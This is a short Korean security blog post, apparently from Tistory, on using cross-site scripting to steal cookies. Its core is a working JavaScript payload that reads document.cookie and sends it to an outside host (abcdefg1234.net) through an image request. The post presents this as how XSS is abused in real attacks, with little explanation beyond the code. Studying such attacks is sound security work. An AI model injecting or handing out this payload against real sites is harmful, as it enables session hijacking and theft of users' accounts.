Hacking/Web Hacking

[Web Hacking / 웹 해킹] XSS 쿠키 탈취 공격 스크립트 작성

김유비야 2024. 1. 9. 16:21

※ 설명을 위한 사진이 첨부되어 있어 PC화면으로 보는 것을 권장드립니다.

지난 게시글에선 다양한 공격기법 중 XSS의 기본 개념과 종류에 대해 알아보았다.

이번엔 XSS가 모의해킹 업무가 아닌 실제에서 어떤 식으로 악용될 수 있을지 알아보려고 한다.

XSS의 기본 개념과 종류, 작동원리가 궁금하다면 하단의 게시글 참고!
https://yubi323.tistory.com/76

 

[Web Hacking / 웹 해킹] XSS 크로스 사이트 스크립팅 공격기법이란?

※ 설명을 위한 사진이 첨부되어 있어 PC화면으로 보는 것을 권장드립니다. 지난 게시글에선 다양한 공격기법 중 SQL injection에 대해 알아보았다. 이번엔 XSS라는 SQLi만큼 중요하고, 유명한 공격기

yubi323.tistory.com

 

출처: 직접 제작

 

 

 

 

<코드 참고>

<script>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://abcdefg1234.net/?cookieData=" + cookieData;
</script>

 

 

 

저작자표시